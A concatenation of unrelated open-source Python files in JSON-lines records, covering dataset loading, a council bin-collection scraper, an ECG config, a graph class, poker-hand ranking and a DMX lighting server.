\"\"\"\n image_open_pointer = image_path\n if image_path.startswith(\"http://\") or image_path.startswith(\"https://\"):\n response = _get_retry_session(image_path).get(image_path)\n 
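# the downloaded payload is wrapped in BytesIO below so PIL can open it like a local file\n 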
image_open_pointer = BytesIO(response.content)\n with Image.open(image_open_pointer) as im:\n if image_mode is not None:\n im = im.convert(image_mode)\n image_array = np.asarray(im)\n return image_array\n\n\ndef convert_images(dataset, image_mode):\n \"\"\"Converts the images to the format required by the model.\n\n If the images are base64 encoded, they are decoded and converted to\n numpy arrays. If the images are already numpy arrays, they are\n returned as is.\n\n :param dataset: The dataset to convert.\n :type dataset: numpy.ndarray\n :param image_mode: The mode to open the image in.\n See pillow documentation for all modes:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html\n :type image_mode: str\n :return: The converted dataset.\n :rtype: numpy.ndarray\n \"\"\"\n if len(dataset) > 0 and isinstance(dataset[0], str):\n try:\n dataset = np.array([get_image_from_path(\n x, image_mode) for x in dataset])\n except ValueError:\n # if images of different sizes, try to convert one by one\n jagged = np.empty(len(dataset), dtype=object)\n for i, x in enumerate(dataset):\n jagged[i] = get_image_from_path(x, image_mode)\n dataset = jagged\n return dataset\n\n\ndef get_images(dataset, image_mode, transformations=None):\n \"\"\"Get the images from the dataset.\n\n If transformations are provided as a callable, the images\n are transformed. If transformations are provided as a string,\n the images are retrieved from that column name in the test dataset.\n\n :param dataset: The dataset to get the images from.\n :type dataset: numpy.ndarray\n :param image_mode: The mode to open the image in.\n See pillow documentation for all modes:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html\n :type image_mode: str\n :param transformations: The transformations to apply to the images.\n :type transformations: torchvision.transforms\n :return: The images.\n :rtype: numpy.ndarray\n \"\"\"\n IMAGE = \"image\"\n IMAGE_URL = \"image_url\"\n\n column_names = dataset.columns\n is_transformations_str = isinstance(transformations, str)\n if is_transformations_str:\n images = dataset[transformations]\n else:\n if IMAGE in column_names:\n images = dataset[IMAGE]\n elif IMAGE_URL in column_names:\n images = dataset[IMAGE_URL]\n else:\n raise ValueError('No image column found in test data')\n\n images = np.array(images.tolist())\n converted_images = convert_images(images, image_mode)\n\n if not is_transformations_str and transformations is not None:\n converted_images = transformations(converted_images)\n\n return converted_images\n\n\ndef load_fridge_object_detection_dataset_labels():\n \"\"\"Loads the labels for the fridge object detection dataset.\n\n return: list of labels\n rtype: list\n \"\"\"\n\n src_images = \"./data/odFridgeObjects/\"\n\n # Path to the annotations\n annotations_folder = os.path.join(src_images, \"annotations\")\n\n labels = []\n label_dict = {'can': 1, 'carton': 2, 'milk_bottle': 3, 'water_bottle': 4}\n\n # Read each annotation\n for _, filename in enumerate(os.listdir(annotations_folder)):\n if filename.endswith(\".xml\"):\n print(\"Parsing \" + os.path.join(src_images, filename))\n\n root = ET.parse(\n os.path.join(annotations_folder, filename)\n ).getroot()\n\n # use if needed\n # width = int(root.find(\"size/width\").text)\n # height = int(root.find(\"size/height\").text)\n\n image_labels = []\n for object in root.findall(\"object\"):\n name = object.find(\"name\").text\n xmin = object.find(\"bndbox/xmin\").text\n ymin = object.find(\"bndbox/ymin\").text\n xmax = 
object.find(\"bndbox/xmax\").text\n ymax = object.find(\"bndbox/ymax\").text\n isCrowd = int(object.find(\"difficult\").text)\n image_labels.append([\n label_dict[name], # label\n float(xmin), # topX. To normalize, divide by width.\n float(ymin), # topY. To normalize, divide by height.\n float(xmax), # bottomX. To normalize, divide by width\n float(ymax), # bottomY. To normalize, divide by height\n int(isCrowd)\n ])\n labels.append(image_labels)\n\n return labels\n\n\ndef load_fridge_object_detection_dataset():\n \"\"\"Loads the fridge object detection dataset.\n\n return: pandas dataframe with image paths and labels\n rtype: pd.DataFrame\n \"\"\"\n # create data folder if it doesnt exist.\n os.makedirs(\"data\", exist_ok=True)\n\n # download data\n download_url = (\"https://cvbp-secondary.z19.web.core.windows.net/\" +\n \"datasets/object_detection/odFridgeObjects.zip\")\n data_file = \"./odFridgeObjects.zip\"\n request_file.urlretrieve(download_url, filename=data_file)\n\n # extract files\n with ZipFile(data_file, \"r\") as zip:\n print(\"extracting files...\")\n zip.extractall(path=\"./data\")\n print(\"done\")\n # delete zip file\n os.remove(data_file)\n\n labels = load_fridge_object_detection_dataset_labels()\n\n # get all file names into a pandas dataframe with the labels\n data = pd.DataFrame(columns=[\"image\", \"label\"])\n for i, file in enumerate(os.listdir(\"./data/odFridgeObjects/\" + \"images\")):\n image_path = \"./data/odFridgeObjects/\" + \"images\" + \"/\" + file\n data = data.append({\"image\": image_path,\n \"label\": labels[i]}, # folder\n ignore_index=True)\n\n return data\n","repo_name":"microsoft/responsible-ai-toolbox","sub_path":"rai_test_utils/rai_test_utils/datasets/vision/object_detection_data_utils.py","file_name":"object_detection_data_utils.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"37"} +{"seq_id":"74146151468","text":"# Highly based on milton_keynes_gov_uk.py\n\nfrom datetime import datetime\nfrom time import time_ns\n\nimport requests\nfrom waste_collection_schedule import Collection # type: ignore[attr-defined]\n\nTITLE = \"North Yorkshire Council - Hambleton\"\nDESCRIPTION = \"Source for North Yorkshire Council - Hambleton.\"\nURL = \"https://northyorks.gov.uk\"\nTEST_CASES = {\n \"010070735142\": {\"uprn\": \"010070735142\"},\n \"100050360667\": {\"uprn\": \"100050360667\"},\n \"010070732324, leading 0 missing\": {\"uprn\": 10070732324},\n}\n\n\nICON_MAP = {\n \"REFUSE\": \"mdi:trash-can\",\n \"GARDEN WASTE\": \"mdi:leaf\",\n \"RECYCLING\": \"mdi:recycle\",\n}\n\nHEADERS = {\n \"user-agent\": \"Mozilla/5.0\",\n}\n\nAPI_URL = \"https://hambletondc-self.achieveservice.com/service/Bin_collection_finder\"\n\n\nclass Source:\n def __init__(self, uprn: str | int):\n self._uprn: str = str(uprn).zfill(12)\n\n def fetch(self):\n s = requests.Session()\n\n # Set up session\n timestamp = time_ns() // 1_000_000 # epoch time in milliseconds\n s.get(\n \"https://hambletondc-self.achieveservice.com/apibroker/domain/hambletondc-self.achieveservice.com\",\n params={\n \"_\": timestamp,\n },\n headers=HEADERS,\n )\n\n # This request gets the session ID\n sid_request = s.get(\n \"https://hambletondc-self.achieveservice.com/authapi/isauthenticated\",\n params={\n \"uri\": \"https://hambletondc-self.achieveservice.com/service/Bin_collection_finder\",\n \"hostname\": \"hambletondc-self.achieveservice.com\",\n \"withCredentials\": \"true\",\n },\n )\n sid_data = 
sid_request.json()\n sid = sid_data[\"auth-session\"]\n\n # This request retrieves the schedule\n timestamp = time_ns() // 1_000_000 # epoch time in milliseconds\n payload = {\n \"formValues\": {\n \"Address search\": {\n \"pccUPRN\": {\"value\": self._uprn},\n \"selectedUPRN\": {\"value\": self._uprn},\n }\n }\n }\n schedule_request = s.post(\n \"https://hambletondc-self.achieveservice.com/apibroker/runLookup\",\n headers=HEADERS,\n params={\n \"id\": \"62b1d2c960a47\",\n \"repeat_against\": \"\",\n \"noRetry\": \"true\",\n \"getOnlyTokens\": \"undefined\",\n \"log_id\": \"\",\n \"app_name\": \"AF-Renderer::Self\",\n \"_\": str(timestamp),\n \"sid\": str(sid),\n },\n json=payload,\n )\n rowdata = schedule_request.json()[\"integration\"][\"transformed\"][\"rows_data\"]\n\n # Extract bin types and next collection dates\n entries = []\n for item in rowdata.values():\n bin_type = item[\"Collection_Type\"]\n date_str = item[\"Collection_Date\"]\n date = datetime.strptime(date_str, \"%Y-%m-%d\").date()\n icon = ICON_MAP.get(bin_type.upper().replace(\"COLLECTION\", \"\"))\n entries.append(\n Collection(t=bin_type, date=date, icon=icon),\n )\n return entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/northyorks_hambleton_gov_uk.py","file_name":"northyorks_hambleton_gov_uk.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"40735604405","text":"import gen\r\n\r\ntba = gen.setup()\r\n\r\ndist = 'chs'\r\nyear = 2019\r\n\r\ndistKey = str(year)+dist\r\ndistEvents = tba.district_events(distKey, False, True)\r\n\r\noodPlays = []\r\nfor team in tba.district_teams(distKey, False, True):\r\n print(\"Processing team \" + team)\r\n\r\n for event in tba.team_events(team, year, False):\r\n if event['key'] not in distEvents:\r\n teamModel = {'Team': team, 'Event': event['event_code'], 'Type': event['event_type']}\r\n oodPlays.append(teamModel)\r\n\r\ngen.listOfDictToCSV(distKey + \"_ood\", oodPlays, ['Team', 'Event', 'Type'])","repo_name":"PChild/frc-data-scripts","sub_path":"externalPlay.py","file_name":"externalPlay.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26657309015","text":"import sys\n\n\nimport os\nfrom enum import Enum\nimport pandas as pd\n\nimport time\n\nclass Config:\n RESOURCES_DIR = 'resource'\n DATA_DIR = 'data'\n QTDB_RECORD_DIR = 'data/' + 'qtdb/physionet.org/files/qtdb/1.0.0/'\n LUDB_RECORD_DIR = 'data/' + 'physionet.org/files/ludb/1.0.1/'\n\n P_H = 1\n QRS_H = 3\n T_H = 2\n\n def __init__(self):\n ####signal####\n self.dataset = 'ludb'\n self.wave_len = 280\n self.fc = 250\n ####data####\n self.seed = 1\n self.data = None\n self.batch_size = 32\n self.epochs = 30\n self.lr = 1e-3\n self.kernel_size = 9\n self.conv_channels = 32\n self.train_verbose = True\n\n ####filename####\n self.refresh()\n\n def print(self):\n print('filename:', self.fname_data)\n\n def refresh(self):\n \"\"\"Rebuild the cached filenames from the current dataset name\"\"\"\n self.fname_data = Config.DATA_DIR + '/' + self.dataset + '.pkl'\n self.fname_model = Config.RESOURCES_DIR + '/' + self.dataset + '_model.h5'\n self.fname_history = Config.RESOURCES_DIR + '/' + self.dataset + '_history.pkl'\n
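\n# Example usage (illustrative):\n# cfg = Config()\n# cfg.dataset = 'qtdb' # switching datasets requires a refresh\n# cfg.refresh() # so the cached filenames are rebuilt\n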
\n","repo_name":"zhenqinchen/ECG-Delineation","sub_path":"utils/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"28072308200","text":"import interface as i\n\ndef se_arq_existe(arq):\n try:\n arquivo = open(arq, 'rt')\n except:\n arquivo = open(arq, 'wt+')\n print(f'O arquivo {arq} foi criado')\n finally:\n arquivo.close()\n\n\ndef ler_arquivo(arq):\n try:\n a = open(arq, 'rt')\n except:\n print('Erro ao ler o arquivo')\n else:\n i.cabecalho('PESSOAS CADASTRADAS')\n for linha in a:\n dado = linha.split(';')\n dado[1] = dado[1].replace('\\n','')\n print(f'{dado[0]:<30}{dado[1]:>3} anos')\n finally:\n a.close()\n\n\ndef cadastrar_pessoa(arq, nome='desconhecido', idade=0):\n try:\n a = open(arq, 'at')\n except:\n print('Houve um erro na abertura do arquivo.')\n else:\n try:\n a.write(f'{nome};{idade}\\n')\n except:\n print('Houve um erro ao adicionar a pessoa.')\n else:\n print(f'{nome} adicionado com sucesso.')\n finally:\n a.close()\n","repo_name":"malucaires/cursoemvideo_python","sub_path":"mundo_3/ex115/arquivo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32619678038","text":"import numpy as np\nfrom parameter import *\n'''\nx_min=0\ny_min=0\nz_min=0\nx_max=130\ny_max=220\nz_max=30\nx_width=1\ny_width=1\nz_width=1\nnel_x=x_max/x_width\nnel_y=y_max/y_width\nnel_z=z_max/z_width\n'''\nBr_El=np.loadtxt('NodeOfBrelement_whole.txt')##########branch element\nnode=np.loadtxt('CoorOfBrelement_whole.txt')############branch node\n\n#if it is 1, it is terminal br, if it is zero it is not\nT_Br=np.ones((len(Br_El),1))\nterm_block = np.zeros((nel_x*nel_y*nel_z,1))\nT_ELIN= np.zeros((nel_x*nel_y*nel_z,1))\n\n\n\nfor i in range(0, len(Br_El)):\n for j in range(0,len(Br_El)): \n \n if Br_El[j,0] == Br_El[i,1]:\n T_Br[i] = 0\n \n \nTerminal_El_num=np.array(np.where(T_Br[:,0]==1))### this is minus one value\n\n\nf=open(\"Terminal_El_num.txt\",'w')\n\nfor P in range(0,len(Terminal_El_num[0])):\n \n f.write(\"%d\\n\" %(Terminal_El_num[0,P] ))\nf.close()\nraise SystemExit\n\n#print Terminal_El_num [0,0]\n\n\nfor j in range(0,len(Terminal_El_num[0])):\n\n\n Endpoints = node[[Br_El[Terminal_El_num[0][j],1]-1]]\n #print (Endpoints[0,0])\n num_x = np.floor((Endpoints[0,0]-x_min)/x_width)+1;\n num_y = np.floor((Endpoints[0,1]-y_min)/y_width)+1;\n num_z = np.floor((Endpoints[0,2]-z_min)/z_width)+1;\n \n if num_x > nel_x:\n num_x = nel_x\n\n if num_y >= nel_y:\n num_y = nel_y\n \n if num_z >= nel_z:\n num_z = nel_z\n\n T_e = ((num_z-1)*nel_x*nel_y + (num_y-1)*nel_x + num_x)-1###############CHECK##########e is numbering of mesh\n term_block[T_e,0] = 1;# if 1, that block element contain terminal branch\n T_ELIN[T_e,0]=Terminal_El_num[0][j]\n\n\n\nf=open(\"terminal_block_whole.txt\",'w')\n\nfor P in range(0,len(term_block)):\n \n f.write(\"%d\\n\" %(term_block[P] ))\nf.close()\n\n \nf=open(\"terminal_element_whole.txt\",'w')# this value is already minus one\n\nfor S in range(0,len(Terminal_El_num[0])):\n \n f.write(\"%d\\n\" %(Terminal_El_num[0][S]+1 ))\nf.close()\n'''\n\nnp.nonzero(term_block)\nnp.nonzero(T_ELIN)\nf=open(\"terminal_element_bl.txt\",'w')# this value is already minus one\n\nfor O in range(0,len(term_block)):\n \n f.write(\"%d %d\\n\" %(term_block[O], T_ELIN[O]+1 ))\nf.close()\n\n'''\n\n\n 
\n","repo_name":"wintun24/oxygen_model","sub_path":"TerminalBr.py","file_name":"TerminalBr.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3563075451","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('agents', '0003_auto_20150218_1110'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='OutsideAgent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('forename', models.CharField(max_length=32)),\n ('surname', models.CharField(max_length=64, null=True, blank=True)),\n ('mobile', models.CharField(max_length=64)),\n ('email', models.EmailField(max_length=255, null=True, blank=True)),\n ('photo', models.ImageField(null=True, upload_to=b'agent_photos', blank=True)),\n ('search', models.CharField(max_length=255, null=True, blank=True)),\n ('agency', models.ForeignKey(to='agents.Agency')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='agent',\n name='is_active',\n field=models.BooleanField(default=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agent',\n name='is_admin',\n field=models.BooleanField(default=False),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agent',\n name='last_login',\n field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agent',\n name='password',\n field=models.CharField(default='test', max_length=128, verbose_name='password'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='agent',\n name='agency',\n field=models.ForeignKey(blank=True, to='agents.Agency', null=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='email',\n field=models.EmailField(default='info@bienfacile.com', unique=True, max_length=255, verbose_name=b'email address'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='agent',\n name='forename',\n field=models.CharField(max_length=254),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='mobile',\n field=models.CharField(max_length=254, null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='photo',\n field=models.ImageField(null=True, upload_to=b'developer_images', blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='surname',\n field=models.CharField(default='TEST', max_length=254),\n preserve_default=False,\n ),\n ]\n","repo_name":"TalentedSunday/Real-estate-app","sub_path":"agents/migrations/0004_auto_20150219_0932.py","file_name":"0004_auto_20150219_0932.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2823615811","text":"# Creating Graph using Adjacency Matrix.\nprint()\n\nimport numpy as np\n\n\nclass Graph:\n def __init__(self,size):\n self.size=size\n self.graph=np.zeros((size,size))\n\n def Add_Edge(self,v1,v2):\n self.graph[v1][v2]=1\n self.graph[v2][v1]=1\n \n def Delete_Edge(self,v1,v2):\n if self.graph[v1][v2]==0 and self.graph[v2][v1]==0:\n print('\\nNo edge betwwen the vertex')\n else:\n 
self.graph[v1][v2]=0\n self.graph[v2][v1]=0\n\n def Print_Graph(self):\n print(self.graph)\n\n\nif __name__==\"__main__\":\n num=int(input(\"Enter the number of vertices: \"))\n G=Graph(num)\n while True:\n print('\\n================================')\n print('1: Insert Edges (Connect Vertex)')\n print('2: Delete Edges (Disconnect Vertex)')\n print('3: Display')\n print('4: Exit')\n ch=int(input(\"Enter Your choice: \"))\n\n if ch==1:\n v1,v2=input(\"Enter two space-separated vertices: \").split()\n v1=int(v1)\n v2=int(v2)\n G.Add_Edge(v1,v2)\n elif ch==2:\n v1,v2=input(\"Enter two space-separated vertices: \").split()\n v1=int(v1)\n v2=int(v2)\n G.Delete_Edge(v1,v2)\n elif ch==3:\n G.Print_Graph()\n elif ch==4:\n quit()\n else:\n print('\\nInvalid Choice')","repo_name":"puneet4840/Data-Structure-and-Algorithms","sub_path":"Graph in Python/1 - Implementation of Graph/1 - Create Graph using Adjacency Matrix.py","file_name":"1 - Create Graph using Adjacency Matrix.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12581141736","text":"from card import *\nfrom deck import *\nfrom copy import deepcopy\nfrom collections import Counter\n\"\"\"\nModule containing a PokerHand class\n\n:author: Neil Daterao\n\"\"\"\n\nmax_cards_in_hand = 5\n\nclass PokerHand: \n \"\"\"\n Class that creates a poker hand object \n \"\"\"\n \n def __init__(self,list_of_cards):\n \"\"\"\n Constructor initializes a copy of a deck of cards and an empty hand \n \"\"\"\n self.__list_of_cards = deepcopy(list_of_cards) #Creates a copy of the list of card objects\n self.__hand = [] \n for count in range(max_cards_in_hand):\n self.__hand.append(self.__list_of_cards[count])\n \n \n def add_card(self, card):\n \"\"\"\n Function that adds the card object passed in as a parameter to the hand. 
Prints an error if the hand is already full\n \"\"\"\n if self.size() < max_cards_in_hand:\n self.__hand.append(card)\n else:\n print(\"Error: Hand is full\")\n \n \n def get_ith_card(self, index):\n \"\"\"\n Return a card from the hand at the given index\n \n :return: a card object\n \"\"\"\n if index < 0 or index >= self.size():\n print(\"Error: Invalid Index\")\n return None\n \n return self.__hand[index]\n \n \n def size(self):\n \"\"\"\n Get the current size of the hand\n \n :return: Integer representing the size of the hand\n \"\"\"\n return len(self.__hand)\n \n \n def __str__(self):\n \"\"\"\n Return string version of hand with one card per line\n \n :return: String version of the hand with one card per line\n \"\"\"\n \n string_version_of_hand = \"\"\n for card in self.__hand:\n string_version_of_hand += str(card) + \"\\n\"\n return string_version_of_hand\n \n \n def __is_flush(self):\n \"\"\"\n Determines if hand is a flush\n\n :return: Boolean, True if a flush and False if not\n \"\"\"\n first_card = self.get_ith_card(0)\n previous = first_card.get_suit()\n for card in self.__hand:\n if card.get_suit() != previous:\n return False\n previous = card.get_suit()\n return True\n \n \n def __num_of_pairs(self):\n \"\"\"\n Determines number of pairs in a hand\n\n :return: An integer representing the number of pairs \n \"\"\"\n \n rank_of_cards = []\n for card in self.__hand: \n rank_of_cards.append(card.get_rank())\n \n count_of_ranks = Counter(rank_of_cards)\n \n pairs = 0 \n for rank in count_of_ranks:\n if count_of_ranks[rank] == 4:\n pairs += 2\n elif count_of_ranks[rank] >= 2:\n pairs += 1\n else:\n pairs += 0\n return pairs\n \n \n def __determine_classification_of_hand(self):\n \"\"\"\n Determines the classification of a hand. In other words, if the hand is a pair, 2 pair, flush, or high card.\n \n :return: A string of the classification of the hand\n\n \"\"\"\n if self.__is_flush():\n return \"Flush\"\n elif self.__num_of_pairs() == 2:\n return \"Two pair\"\n elif self.__num_of_pairs() == 1:\n return \"Pair\"\n else:\n return \"High card\"\n \n \n def __translate_classification_of_hand_to_power_ranking(self):\n \"\"\"\n Function to translate the hand type into a number, 4 (strongest, Flush) to 1 (weakest, High card)\n \n :return: Integer of power ranking\n \"\"\"\n classification_of_hand = self.__determine_classification_of_hand()\n if classification_of_hand == \"Flush\":\n power_ranking = 4\n elif classification_of_hand == \"Two pair\":\n power_ranking = 3\n elif classification_of_hand == \"Pair\":\n power_ranking = 2\n else:\n power_ranking = 1\n return power_ranking\n \n \n def __get_ranks_of_hand_in_list(self):\n \"\"\"\n Translates the ranks of the cards in the hand into a list\n \n :return: A list of the ranks of the cards in the hands\n \"\"\"\n \n ranks_of_hand = []\n for index in range(max_cards_in_hand):\n ranks_of_hand.append(self.get_ith_card(index).get_rank())\n return ranks_of_hand\n \n \n def __determine_winning_flush(self, other_hand):\n \"\"\"\n Function to determine a winning flush given two hands that are flushes. Returns 1 if the \"self\" hand wins, -1 if the other hand wins and 0 if the hands tie. \n \n :param other_hand: A PokerHand object which is a flush \n :return: 1 if the \"self\" hand wins, -1 if the other hand wins and 0 if the hands tie. \n \"\"\"\n #Since we already know this is a flush, we only need to compare the ranks of the cards, so we can use the same algorithm we used to check high cards. 
\n \n return self.__determine_winning_high_card(other_hand)\n \n \n def __determine_winning_two_pair(self, other_hand):\n \"\"\"\n Function to determine which hand of two pairs is stronger\n \n :param other_hand: Another PokerHand Object which is classified as a two pair \n :return: Will return 1 if the \"self\" PokerHand is stronger, -1 if the other_hand PokerHand is stronger and 0 if they are of equal strength \n \"\"\"\n pairs_in_self = []\n extra_card_in_self = None\n pairs_in_other_hand = []\n extra_card_in_other_hand = None\n max_index = 2 #Magic number but since the function is private it's okay! The reason for this magic number is to account for hands where we are comparing 4 of a kind to a 2 regular 2 pair.\n \n ranks_in_self = self.__get_ranks_of_hand_in_list()\n ranks_in_other_hand = other_hand.__get_ranks_of_hand_in_list()\n \n counts_of_ranks_in_self = Counter(ranks_in_self)\n counts_of_ranks_in_other_hand = Counter(ranks_in_other_hand)\n \n for card in counts_of_ranks_in_self:\n if counts_of_ranks_in_self[card] >= 2:\n pairs_in_self.append(card)\n else:\n extra_card_in_self = card \n \n for card in counts_of_ranks_in_other_hand:\n if counts_of_ranks_in_other_hand[card] >= 2:\n pairs_in_other_hand.append(card)\n else:\n extra_card_in_other_hand = card \n \n pairs_in_self.sort(reverse=True)\n pairs_in_other_hand.sort(reverse=True)\n \n if len(pairs_in_self) != len(pairs_in_other_hand):\n max_index = 1\n \n for card_count in range(0,max_index):\n if pairs_in_self[card_count] > pairs_in_other_hand[card_count]:\n return 1\n elif pairs_in_self[card_count] < pairs_in_other_hand[card_count]:\n return -1\n \n return extra_card_in_self - extra_card_in_other_hand\n \n \n def __determine_winning_one_pair(self, other_hand):\n \"\"\"\n Function to determine which hand of pairs is stronger\n \n :param other_hand: Another PokerHand Object which is classified as a Pair \n :return: Will return 1 if the \"self\" PokerHand is stronger, -1 if the other_hand PokerHand is stronger and 0 if they are of equal strength \n \"\"\"\n pair_in_self = None\n extra_cards_in_self = []\n pair_in_other_hand = None\n extra_cards_in_other_hand = []\n max_index = 3 #Magic number again, but it's okay since it is a private function, this is to account for comparing three of a kind with one pair, the list of extra cards will be different lengths and we want to iterate through the smallest sorted array.\n \n ranks_in_self = self.__get_ranks_of_hand_in_list()\n ranks_in_other_hand = other_hand.__get_ranks_of_hand_in_list() \n \n for card_rank in ranks_in_self:\n if card_rank in extra_cards_in_self:\n pair_in_self = card_rank\n else:\n extra_cards_in_self.append(card_rank)\n \n for card_rank in ranks_in_other_hand:\n if card_rank in extra_cards_in_other_hand:\n pair_in_other_hand = card_rank\n else:\n extra_cards_in_other_hand.append(card_rank)\n \n extra_cards_in_self.sort(reverse=True)\n extra_cards_in_other_hand.sort(reverse=True)\n \n if len(extra_cards_in_self) != len(extra_cards_in_other_hand):\n max_index = 2 \n \n if pair_in_self == pair_in_other_hand:\n for card_count in range(max_index):\n if extra_cards_in_self[card_count] > extra_cards_in_other_hand[card_count]:\n return 1\n elif extra_cards_in_self[card_count] < extra_cards_in_other_hand[card_count]:\n return -1 \n \n return pair_in_self - pair_in_other_hand\n \n \n def __determine_winning_high_card(self,other_hand):\n \"\"\"\n Function to determine which hand of high cards is stronger\n \n :param other_hand: Another PokerHand Object which is classified as 
a High Card\n :return: Will return 1 if the \"self\" PokerHand is stronger, -1 if the other_hand PokerHand is stronger and 0 if they are of equal strength \n \"\"\"\n \n ranks_of_self_hand = self.__get_ranks_of_hand_in_list()\n ranks_of_other_hand = other_hand.__get_ranks_of_hand_in_list()\n \n ranks_of_self_hand.sort(reverse= True)\n ranks_of_other_hand.sort(reverse= True)\n \n card_count = 0 \n while card_count < max_cards_in_hand:\n if ranks_of_self_hand[card_count] == ranks_of_other_hand[card_count]:\n card_count += 1\n elif ranks_of_self_hand[card_count] > ranks_of_other_hand[card_count]:\n return 1\n elif ranks_of_self_hand[card_count] < ranks_of_other_hand[card_count]:\n return -1\n return 0\n \n\n def compare_to(self, other_hand):\n \"\"\"\n Determines which of two poker hands is worth more. Returns an int\n which is either positive, negative, or zero depending on the comparison.\n \n :param self: The first hand to compare\n :param other_hand: The second hand to compare\n :return: a negative number if self is worth LESS than other_hand,\n zero if they are worth the SAME (a tie), and a positive number if\n self is worth MORE than other_hand\n \"\"\"\n classification_of_self_hand = self.__determine_classification_of_hand()\n classification_of_other_hand = other_hand.__determine_classification_of_hand()\n power_ranking_of_hand = self.__translate_classification_of_hand_to_power_ranking()\n power_ranking_of_other_hand = other_hand.__translate_classification_of_hand_to_power_ranking()\n \n if power_ranking_of_hand - power_ranking_of_other_hand == 0:\n if classification_of_self_hand == \"Flush\":\n return self.__determine_winning_flush(other_hand)\n elif classification_of_self_hand == \"Two pair\":\n return self.__determine_winning_two_pair(other_hand)\n elif classification_of_self_hand == \"Pair\":\n return self.__determine_winning_one_pair(other_hand)\n else:\n return self.__determine_winning_high_card(other_hand)\n \n else:\n return power_ranking_of_hand - power_ranking_of_other_hand\n \n\nif __name__ == \"__main__\":\n #messy tests\n hand = PokerHand([Card(13, \"D\"), Card(10,\"D\"), Card(5,\"D\"), Card(4,\"D\"), Card(2, \"D\")])\n hand1 = PokerHand([Card(8, \"C\"), Card(8,\"D\"), Card(3,\"H\"), Card(3,\"S\"), Card(6, \"D\")])\n hand3 = PokerHand([Card(8, \"C\"), Card(8,\"D\"), Card(3,\"H\"), Card(3,\"S\"), Card(7, \"D\")])\n \n hand4 = PokerHand([Card(4, \"D\"), Card(4, \"C\"), Card(4, \"S\"), Card(4,\"D\"), Card(12, \"S\")])\n hand5 = PokerHand([Card(7, \"D\"), Card(7, \"C\"), Card(7, \"S\"), Card(6,\"D\"), Card(6, \"S\")])\n\n hand2 = PokerHand([Card(13, \"D\"), Card(10,\"D\"), Card(7,\"D\"), Card(4,\"D\"), Card(2, \"D\")])\n print(hand.compare_to(hand1))\n print(hand1.compare_to(hand3))\n print(hand4.compare_to(hand5))\n ","repo_name":"NeilD-18/CSC-120","sub_path":"Project 2 - How Does it Rank? 
ND/poker_hand.py","file_name":"poker_hand.py","file_ext":"py","file_size_in_byte":12415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"69938380909","text":"import socketio\nimport eventlet\nimport eventlet.wsgi\nfrom flask import Flask\n\nfrom pyenttec import DMXConnection\n\nport = DMXConnection('/dev/ttyUSB0')\n\nsio = socketio.Server()\napp = Flask(__name__)\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef send_pixels(rgb_tuples):\n # print(\"sending pixel: {}\".format(rgb_tuples))\n for bar_number, bar_rgb_tuples in enumerate(chunks(rgb_tuples, 8)):\n if bar_number == 0:\n offset = 0\n else:\n offset = bar_number * 34\n brightness_channel = 33 + offset\n # print('brightness_channel: {}'.format(brightness_channel))\n port.dmx_frame[brightness_channel] = 255\n for rgb_tuple in bar_rgb_tuples:\n rgb_tuple.append(0)\n #print(rgb_tuple)\n for channel, value in enumerate(sum(bar_rgb_tuples, [])):\n # print(\"channel: {} value: {}\".format(channel+offset, value))\n port.dmx_frame[channel+offset] = value\n # port.dmx_frame[33] = randint(0,255)\n # for channel, value in enumerate(sum(rgb_tuples, [])):\n # for channel in range(0, 31):\n # port.dmx_frame[channel] = value\n # sleep(0.1)\n port.render()\n\n@sio.on('connect', namespace='/chat')\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n@sio.on('chat message', namespace='/chat')\ndef message(sid, data):\n # print(\"message \", data)\n send_pixels(data)\n\n@sio.on('disconnect', namespace='/chat')\ndef disconnect(sid):\n print('disconnect ', sid)\n\nif __name__ == '__main__':\n # wrap Flask application with engineio's middleware\n app = socketio.Middleware(sio, app)\n\n # deploy as an eventlet WSGI 